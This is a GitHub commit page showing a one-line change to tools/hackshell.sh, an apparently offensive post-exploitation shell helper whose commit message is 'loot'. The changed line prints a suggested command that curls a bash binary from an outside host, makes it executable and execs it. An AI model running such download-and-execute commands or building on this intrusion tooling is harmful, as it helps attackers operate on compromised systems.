Skip to content

Commit 205c000

Browse files
committed
loot
1 parent 2d008ce commit 205c000

File tree

1 file changed

+1
-1
lines changed

1 file changed

+1
-1
lines changed

tools/hackshell.sh

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -472,7 +472,7 @@ hs_init() {
472472
local str
473473

474474
[ -z "$BASH" ] && { HS_WARN "Shell is not BASH. Try:
475-
${CY}>>>>> ${CDC}curl -obash -SsfL 'https://bin.ajam.dev/$(uname -m)/bash && chmod 700 bash && exec bash -il'"; }
475+
${CY}>>>>> ${CDC}curl -obash -SsfL 'https://bin.ajam.dev/$(uname -m)/bash && chmod 700 bash && exec bash -il'"; sleep 2; }
476476
[ -n "$BASH" ] && [ "${prg##*\.}" = "sh" ] && { HS_ERR "Use ${CDC}source $prg${CDR} instead"; sleep 2; exit 255; }
477477
[ -z "$UID" ] && UID="$(id -u)"
478478
[ -n "$_HS_HOME_ORIG" ] && export HOME="$_HS_HOME_ORIG"

0 commit comments

Comments
 (0)